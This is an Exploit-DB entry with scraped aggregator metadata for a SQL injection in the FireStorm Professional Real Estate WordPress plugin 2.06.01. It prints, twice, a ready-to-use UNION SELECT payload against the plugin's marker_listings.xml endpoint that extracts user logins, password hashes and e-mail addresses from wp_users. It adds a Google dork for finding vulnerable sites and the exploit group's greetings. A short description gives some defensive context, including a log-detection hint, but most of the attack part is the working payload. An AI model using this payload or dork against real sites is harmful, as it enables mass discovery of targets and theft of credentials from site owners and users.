FireStorm Professional Real Estate WordPress Plugin 2.06.01 - SQL Injection Vulnerability
2012-10-18T00:00:00
ID EDB-ID:22071 Type exploitdb Reporter Ashiyane Digital Security Team Modified 2012-10-18T00:00:00
Description
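FireStorm Professional Real Estate WordPress Plugin 2.06.01 - SQL Injection Vulnerability. Webapps exploit for the PHP platform. The injectable input is the `id` query parameter of the plugin's `xml/marker_listings.xml` endpoint; the proof of concept below uses it to read login names, password hashes and e-mail addresses from `wp_users`. This entry lists no CVE and no fixed version, so an install of 2.06.01 (and possibly other versions; the entry does not say) should be treated as exposed until a corrected release is confirmed with the vendor. In web server logs, the sign to look for is a request to that path whose `id` value is not a plain number.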
# Exploit Title: Wordpress FireStorm Professional Real Estate 2.06.01 SQL Injection Vulnerability
# Google Dork: inurl:"/fs-real-estate-plugin/xml/marker_listings.xml?id="
# Exploit Author: Ashiyane Digital Security Team
# Software Link: http://www.firestormplugins.com/plugins/real-estate/
# Category: Web Application
# Version: 2.06.01
# Tested on: Windows 7
###############################################################
* Location: http://site.com//wp-content/plugins/fs-real-estate-plugin/xml/marker_listings.xml?id=[SQL]
* Exploit Code: http://site.com//wp-content/plugins/fs-real-estate-plugin/xml/marker_listings.xml?id=1%20union%20all%20select%201,2,3,4,5,6,7,8,group_concat(user_login,char(58),user_pass,char(58),user_email),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 from wp_users--
***************************************************************
* Greetz to: My Lord Allah
* Sp Tnx To: Behrooz_Ice,Q7X,Ali_Eagle,Azazel,iman_taktaz,sha2ow,0x21HATE,A.S.P.I.R.I.N,am118,Angel--D3m0n,angola,AR455,Azad™,Black-Hole,Classic,Encoder,ERroR,Hashor
* HASSAN20,HidDeEn,hossein19123,jooooondost,Kaz3m,ll_Invisible_ll,majidflash,megacpu,MehrdadLinux,Milad-Bushehr,MostafaBestMan,Mute,N4H,Pr0grammer,PrinceofHacking
* Rizux,rlsi2020,Rz04,S!YOU.T4r.6T,Sil3nt Di3,The Smith,unique2world,Unline,V!T0N,X-HIDDEN-X
* Crypt0,khatarnak,Milad22,MrR.CICILI,V1R4N64R,Pirjo
* And All Of My Friends
* The Last One : My Self, Milwar
***************************************************************
###############################################################
{"id": "EDB-ID:22071", "type": "exploitdb", "bulletinFamily": "exploit", "title": "FireStorm Professional Real Estate WordPress Plugin 2.06.01 - SQL Injection Vulnerability", "description": "FireStorm Professional Real Estate Wordpress Plugin 2.06.01 - SQL Injection Vulnerability. Webapps exploit for php platform", "published": "2012-10-18T00:00:00", "modified": "2012-10-18T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/22071/", "reporter": "Ashiyane Digital Security Team", "references": [], "cvelist": [], "lastseen": "2016-02-02T17:54:49", "viewCount": 10, "enchantments": {"score": {"value": -0.0, "vector": "NONE", "modified": "2016-02-02T17:54:49", "rev": 2}, "dependencies": {"references": [], "modified": "2016-02-02T17:54:49", "rev": 2}, "vulnersScore": -0.0}, "sourceHref": "https://www.exploit-db.com/download/22071/", "sourceData": "# Exploit Title: Wordpress FireStorm Professional Real Estate 2.06.01 SQL Injection Vulnerability\r\n# Google Dork: inurl:\"/fs-real-estate-plugin/xml/marker_listings.xml?id=\"\r\n# Exploit Author: Ashiyane Digital Security Team\r\n# Software Link: http://www.firestormplugins.com/plugins/real-estate/\r\n# Category: Web Application\r\n# Version: 2.06.01\r\n# Tested on: Windows 7\r\n###############################################################\r\n* Location: http://site.com//wp-content/plugins/fs-real-estate-plugin/xml/marker_listings.xml?id=[SQL]\r\n* Exploit Code: http://site.com//wp-content/plugins/fs-real-estate-plugin/xml/marker_listings.xml?id=1%20union%20all%20select%201,2,3,4,5,6,7,8,group_concat(user_login,char(58),user_pass,char(58),user_email),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 from wp_users--\r\n***************************************************************\r\n* Greetz to: My Lord Allah\r\n* Sp Tnx To: 
Behrooz_Ice,Q7X,Ali_Eagle,Azazel,iman_taktaz,sha2ow,0x21HATE,A.S.P.I.R.I.N,am118,Angel--D3m0n,angola,AR455,Azad\u00c2\u0099,Black-Hole,Classic,Encoder,ERroR,Hashor\r\n* HASSAN20,HidDeEn,hossein19123,jooooondost,Kaz3m,ll_Invisible_ll,majidflash,megacpu,MehrdadLinux,Milad-Bushehr,MostafaBestMan,Mute,N4H,Pr0grammer,PrinceofHacking\r\n* Rizux,rlsi2020,Rz04,S!YOU.T4r.6T,Sil3nt Di3,The Smith,unique2world,Unline,V!T0N,X-HIDDEN-X\r\n* Crypt0,khatarnak,Milad22,MrR.CICILI,V1R4N64R,Pirjo\r\n* And All Of My Friends \r\n* The Last One : My Self, Milwar \r\n***************************************************************\r\n###############################################################\r\n", "osvdbidlist": ["86686"]}